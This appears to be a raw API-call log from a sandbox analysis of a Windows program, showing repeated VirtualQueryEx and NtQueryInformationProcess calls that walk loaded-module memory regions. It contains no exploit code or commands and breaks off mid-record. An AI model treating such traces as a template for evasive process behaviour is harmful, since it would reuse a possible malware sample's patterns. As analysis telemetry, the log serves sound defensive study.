[0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974520000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974520000, AllocationBase=0x7ff974520000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974000000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974000000, AllocationBase=0x7ff974000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973140000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973140000, AllocationBase=0x7ff973140000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971b90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971b90000, AllocationBase=0x7ff971b90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973110000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973110000, AllocationBase=0x7ff973110000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977720000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977720000, AllocationBase=0x7ff977720000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977200000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977200000, AllocationBase=0x7ff977200000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974720000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974720000, AllocationBase=0x7ff974720000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977b60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977b60000, AllocationBase=0x7ff977b60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977d40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977d40000, AllocationBase=0x7ff977d40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974830000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974830000, AllocationBase=0x7ff974830000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9741d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9741d0000, AllocationBase=0x7ff9741d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9748a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9748a0000, AllocationBase=0x7ff9748a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973e20000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973e20000, AllocationBase=0x7ff973e20000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974340000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974340000, AllocationBase=0x7ff974340000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff969650000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff969650000, AllocationBase=0x7ff969650000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b770000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b770000, AllocationBase=0x7ff96b770000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f790000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f790000, AllocationBase=0x7ff96f790000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973000000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973000000, AllocationBase=0x7ff973000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.144] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9686a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9686a0000, AllocationBase=0x7ff9686a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e4e0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e4e0000, AllocationBase=0x7ff96e4e0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e3f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e3f0000, AllocationBase=0x7ff96e3f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96ecc0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96ecc0000, AllocationBase=0x7ff96ecc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9685b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9685b0000, AllocationBase=0x7ff9685b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9684e0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9684e0000, AllocationBase=0x7ff9684e0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96fca0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96fca0000, AllocationBase=0x7ff96fca0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973070000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973070000, AllocationBase=0x7ff973070000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b4f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b4f0000, AllocationBase=0x7ff96b4f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968470000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968470000, AllocationBase=0x7ff968470000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9739b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9739b0000, AllocationBase=0x7ff9739b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9713b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9713b0000, AllocationBase=0x7ff9713b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.145] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973450000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973450000, AllocationBase=0x7ff973450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.145] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.146] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9755b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9755b0000, AllocationBase=0x7ff9755b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.146] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.146] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968400000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968400000, AllocationBase=0x7ff968400000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.146] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.146] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9683b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9683b0000, AllocationBase=0x7ff9683b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.146] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.146] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e690000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e690000, AllocationBase=0x7ff96e690000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.146] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.146] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973210000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973210000, AllocationBase=0x7ff973210000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.146] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.146] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f920000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f920000, AllocationBase=0x7ff96f920000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.146] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.272] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971a40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971a40000, AllocationBase=0x7ff971a40000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.272] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.272] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971310000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971310000, AllocationBase=0x7ff971310000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.272] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.272] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972b60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972b60000, AllocationBase=0x7ff972b60000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.272] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.272] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968360000, AllocationBase=0x7ff968360000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.272] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.272] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967ed0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967ed0000, AllocationBase=0x7ff967ed0000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.272] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.272] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967eb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967eb0000, AllocationBase=0x7ff967eb0000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.273] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973ca0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973ca0000, AllocationBase=0x7ff973ca0000, AllocationProtect=0x80, __alignment1=0xffffd000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, 